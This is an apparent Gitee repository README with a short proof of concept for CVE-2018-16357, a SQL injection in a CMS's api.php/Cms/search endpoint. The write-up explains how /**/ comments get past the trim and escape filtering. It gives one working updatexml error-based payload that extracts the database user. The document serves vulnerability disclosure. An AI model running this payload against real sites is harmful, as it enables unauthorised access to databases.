1 Star 0 Fork 0

Escape / CVE-2018-16357

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
贡献代码
同步代码
取消
提示: 由于 Git 不支持空文件夾,创建文件夹后会生成空的 .keep 文件
Loading...
README.md

CVE-2018-16357

项目介绍

CVE-2018-16357 detail

#IMGB1 Threre is a sql injection via api.php/Cms/search?#acode=1&num=1&order=1

parameter $field is what we can control,go to check the function filter

输入图片说明

use function trim and escape_string to avoid sql injection

输入图片说明

add a ' and it cause mysql syntax error,so the function escape_string is not effective

输入图片说明

use /**/ to bypass the function trim

payload:field=1)/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/user()),0x7e),1)#&keyword=title&scode=1

输入图片说明

简介

CVE-2018-16357 detail 展开 收起
取消

发行版

暂无发行版

贡献者

全部

近期动态

加载更多
不能加载更多了
1
https://gitee.com/escape_wang/CVE-2018-16357.git
git@gitee.com:escape_wang/CVE-2018-16357.git
escape_wang
CVE-2018-16357
CVE-2018-16357
master

搜索帮助